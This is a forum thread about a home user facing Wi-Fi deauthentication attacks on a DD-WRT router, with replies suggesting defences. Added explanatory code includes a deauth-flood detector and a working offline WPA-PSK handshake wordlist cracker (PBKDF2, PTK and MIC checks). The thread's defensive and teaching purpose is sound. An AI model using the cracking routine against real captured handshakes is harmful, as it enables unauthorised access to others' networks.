
Thread: My ddwrt gateway / ddwrt client bridge is getting pwned... any ideas?

  1. #1 halgorithm (Junior Member, joined Mar 2006)

    First, a little backstory, (sorry in advance)

    I moved a half mile down the street and in with the girlfriend. We found this apartment and it is kick-ass. Turns out, after we moved in, the cable connection only comes into the living room, and the 2nd bedroom, my office, is at the very far end of the 1100 square foot apartment. I wanted to run some cat5, but she says no, and it's a little ugly all along the floor and bordering the 4 doors it passes. We each also have a laptop that has wifi, so I figured I can just drop a USB connector into my PC.

    So I go wifi as my main connection, right? Uh, it's horrible! Maybe my problem is just Vista, but any USB wifi devices I use (I have three of them) are all crap and lose their connection over the course of 1-2 days. Ubuntu did the same thing with one of them, and I didn't feel like playing with the others. So after a month I dug through my computer part bins...

    I took my old Belkin crap router and tftped some ddwrt goodness onto it. Then I bridged the connection to my main router (also running ddwrt).

    It was working very well, solid for a full week, or so I thought... it was flaking out and I figured I'd run kismet to see where and why the packets were dropping, and between which rooms. Turns out, someone is doing a Deauthenticate / Disassociate attack on my main router. So then I did a test and unplugged the ddwrt client bridge, thinking that perchance I fubared something. The attacks continued on my router and also on others, from what I could see in kismet and airodump.

    So other than not using wireless and decreasing the power any further (I'm already at 30 and anything less I drop), any ideas on how I can mitigate an attack?

    This is what I have going so far:

    Standard SSID, non-broadcast, 10 characters, no special characters, but not in the top 1000 SSIDs...

    WPA-PSK AES, 63 character passkey in hex (I'd change to WPA2, but the bridge doesn't work)

    *MAC filter is not working currently on the router; I just found this out a half hour ago and am investigating... Not even sure if I should bother, considering they can clone my MACs and the originating MAC keeps changing from what I can see.


    I'm trying to think of a practical solution and not wallpapering with aluminum foil or living in a Faraday cage. If there isn't much of an idea for the wifi, I'll probably run ethernet for the main PC and try filters and whatnot. I'd have the cable company install coax in the bedroom, but the apartment management won't let it fly.

    Throwing money at the problem like getting ethernet-over-power adapters may help, but I'd like to pick the brains of anyone that has spent more time doing wifi defense than myself. I love a good challenge and I'm wondering how I should proceed. I thought about taking a spare PC or a VM and setting up fakeap or something along those lines.

    Any feedback is appreciated, even if you tell me to smeg off.
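
    The flood the original poster is describing in kismet/airodump is a burst of 802.11 deauthentication/disassociation management frames aimed at one BSSID. The following is an added example, not code from this thread or from any tool named in it: a small detector that parses raw 802.11 management frame headers with the standard library and groups deauth/disassoc frames per target BSSID rather than per source address, since a flooding tool can keep changing its source MAC (as the OP observed) while the BSSID it targets stays fixed. The frames it runs on are constructed in the file; the BSSIDs, client MAC and threshold are made up for the example.

```python
"""Count 802.11 deauth/disassoc frames per target BSSID (added example, not thread code)."""
import struct
from collections import Counter, defaultdict

# 802.11 management frame subtypes (frame control type bits == 00)
SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC


def build_mgmt_frame(subtype, dst, src, bssid, seq, body=b""):
    """Construct a minimal management frame: 24-byte header followed by body."""
    fc = bytes([subtype << 4, 0x00])                 # version 0, type 0 (mgmt), subtype
    duration = b"\x00\x00"
    seq_ctrl = struct.pack("<H", (seq % 4096) << 4)   # fragment 0, 12-bit sequence number
    return fc + duration + dst + src + bssid + seq_ctrl + body


def parse_mgmt_frame(frame):
    """Return (subtype, dst, src, bssid, reason) or None for non-management frames."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:        # type != management: data/control frames never carry deauth
        return None
    subtype = (fc0 >> 4) & 0xF
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]  # reason code follows the header
    return subtype, dst, src, bssid, reason


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def find_deauth_floods(frames, threshold=20):
    """Return {bssid: {count, distinct_sources}} for BSSIDs seeing >= threshold deauth/disassoc."""
    per_bssid = Counter()
    sources = defaultdict(set)
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        subtype, _dst, src, bssid, _reason = parsed
        if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            per_bssid[mac(bssid)] += 1          # group by target network, not by sender
            sources[mac(bssid)].add(mac(src))   # but remember how many senders were seen
    return {b: {"count": n, "distinct_sources": len(sources[b])}
            for b, n in per_bssid.items() if n >= threshold}


def sample_capture():
    """Constructed frames standing in for a sniffer capture (not real data)."""
    broadcast = b"\xff" * 6
    victim_ap = bytes.fromhex("001122334455")   # hypothetical BSSID of the OP's gateway
    other_ap = bytes.fromhex("66778899aabb")    # hypothetical neighbour AP
    client = bytes.fromhex("0c0c0c0c0c0c")      # hypothetical station
    frames = []
    for seq in range(10):                       # ordinary beacons from both APs
        frames.append(build_mgmt_frame(SUBTYPE_BEACON, broadcast, victim_ap, victim_ap, seq))
        frames.append(build_mgmt_frame(SUBTYPE_BEACON, broadcast, other_ap, other_ap, seq))
    frames.append(b"\x08\x00" + b"\x00" * 22 + b"payload")   # a data frame; must be ignored
    # One legitimate deauth (reason 4 = inactivity) from the neighbour AP to its client.
    frames.append(build_mgmt_frame(SUBTYPE_DEAUTH, client, other_ap, other_ap, 100,
                                   struct.pack("<H", 4)))
    # The flood against the victim: 30 broadcast deauths spoofed "from" the AP itself ...
    for seq in range(30):
        frames.append(build_mgmt_frame(SUBTYPE_DEAUTH, broadcast, victim_ap, victim_ap, seq,
                                       struct.pack("<H", 7)))
    # ... plus 20 deauths towards the AP from five rotating spoofed station addresses.
    spoofed = [bytes.fromhex(f"02000000000{i}") for i in range(5)]
    for seq in range(20):
        frames.append(build_mgmt_frame(SUBTYPE_DEAUTH, victim_ap, spoofed[seq % 5], victim_ap,
                                       seq, struct.pack("<H", 7)))
    return frames


if __name__ == "__main__":
    for bssid, info in find_deauth_floods(sample_capture()).items():
        print(f"deauth flood against {bssid}: {info['count']} frames "
              f"from {info['distinct_sources']} source addresses")
```

    On the constructed capture only the victim BSSID crosses the threshold (50 frames from 6 different source addresses), while the single legitimate deauth from the neighbour AP does not; that is the shape to look for in a real airodump or kismet dump before concluding the dropouts are an attack rather than channel congestion.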

  2. #2 (Just burned his ISO, joined Jun 2006)

    I haven't tried this myself, but try putting in a RADIUS auth server.

  3. #3 (Senior Member, joined Apr 2008)

    Since you say that you use WPA encryption with a 63 character key and a non-standard SSID, you at least do not have to fear that the attacker will actually crack your connection. The problem therefore most likely comes down to how persistent in his attempts the person is and how long it will take for him to give up. If we assume that the attacker actually is trying to crack your encryption, as opposed to just annoying you, there would be no reason for him to keep de-authenticating your clients after he has obtained the WPA handshake. After this the rest of his attempt to crack your WPA key can be carried out offline, and since you use a long passphrase he will be kept busy for quite a while until he finally decides to give up.

    If the de-authentication attacks do keep coming, you could always get a directional wireless antenna and, using for example kismet, track down his approximate location using the power readings. Chances are that it is one of your loving neighbours, and most likely a friendly visit will scare him enough to stop bothering you.

    Another completely unrelated possibility is that your AP simply is broadcasting on the same channel as another strong AP nearby and that this is the reason for the inconsistent connection. This can easily be checked using kismet and the channel then changed to a less crowded one if needed.
    -Monkeys are like nature's humans.
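
    The offline phase described in the reply above, as an added example that is not code from this thread: after the 4-way handshake has been captured, a cracker derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations) for each guess, expands it to the PTK, and checks the MIC on the captured EAPOL message; nothing more is needed from the air, so continued deauths buy the attacker nothing. The "captured" handshake here is constructed in the file from a known passphrase; the SSID, MACs, nonces and wordlist are made up, and the MIC is computed with key descriptor version 2 (HMAC-SHA1, the CCMP/AES case), which is an assumption. The same PBKDF2 cost is paid per guess, which is why a random 63 character key is out of reach of a wordlist attack.

```python
"""Offline WPA/WPA2-PSK handshake check (added example, not code from this thread)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This single call is the per-guess cost that makes the offline phase slow.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, length):
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks.
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return ptk[:16]   # KCK, the first 128 bits: the only part needed to check the EAPOL MIC


def eapol_mic(kck, eapol_frame):
    # Key descriptor version 2 (assumed): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    # The MIC occupies bytes 81..96 of an EAPOL-Key frame (4-byte EAPOL header + descriptor).
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid, ap_mac, sta_mac):
    """Construct what a capture would yield: nonces plus the MIC'd EAPOL message 2 (constructed data)."""
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed, not random, for reproducibility
    eapol = bytearray(99)                       # 4-byte header + 95-byte key descriptor, no key data
    eapol[0:2] = b"\x01\x03"                    # EAPOL version 1, packet type 3 (EAPOL-Key)
    eapol[2:4] = (95).to_bytes(2, "big")        # body length
    eapol[4] = 2                                # descriptor type: RSN
    eapol[5:7] = b"\x01\x0a"                    # key info: MIC set, pairwise, descriptor version 2
    eapol[17:49] = snonce                       # supplicant nonce field
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    eapol[81:97] = eapol_mic(kck, bytes(eapol))
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": bytes(eapol)}


def try_wordlist(hs, candidates):
    """Offline: PMK -> KCK -> MIC per candidate, compared against the captured MIC."""
    captured_mic = hs["eapol"][81:97]
    for guess in candidates:
        pmk = pmk_from_passphrase(guess, hs["ssid"])
        kck = kck_from_pmk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    hs = make_handshake("correct horse battery", "halgorithm-net",
                        bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"))
    print(try_wordlist(hs, ["password", "letmein", "correct horse battery"]))
```

    Every guess costs one PBKDF2 run (4096 iterations, 8192 HMAC-SHA1 computations) before the MIC can be compared, and a 63 character random hex key will not appear in any wordlist, so the offline phase never finishes with a hit; what the poster above says follows directly: once the handshake is in hand the deauths serve no purpose for a cracker, and their continuing is a sign of nuisance rather than progress.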

  4. #4 halgorithm (Junior Member, joined Mar 2006)

    Thanks for the feedback. Yeah, I'd have to agree that a RADIUS server would probably help add another layer of protection. Thanks Pipedream.

    Tron, I'm on chan 11 right now, and it appears to be only shared with one other AP in the area, and that one comes up with an average power of 5 or so. But yes, I'll try switching channels for a bit, maybe even some jiffy pop antenna redirectors or something.

    Glancing at my router and the laptop running Kismet, I don't see any more floods after 12am on my router or going across the area, nor has my router needed a restart.

    In any case, I'm going to do a hard reset on my router, update the firmware, and another hard reset to see if I can get the mac table working correctly.


  5. #5 cynicalsoothsayer (Just burned his ISO, joined Oct 2009)

    Try 802.11a

    I know it costs, but you could get some 802.11a 5GHz equipment? Not so many kiddy crackers will have it; they stick to the common 2.4GHz b/g/n.

  6. #6 Archangel-Amael (Super Moderator, joined Jan 2010)

    Quote, originally posted by cynicalsoothsayer:
    I know it costs, but you could get some 802.11a 5GHz equipment? Not so many kiddy crackers will have it; they stick to the common 2.4GHz b/g/n.
    Welcome to the forums. It might be a good idea for you to re-read the rules you agreed to.
    Not to mention that it is considered bad form to dig up a thread that is over a year old.
    To be successful here you should read all of the following.
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.
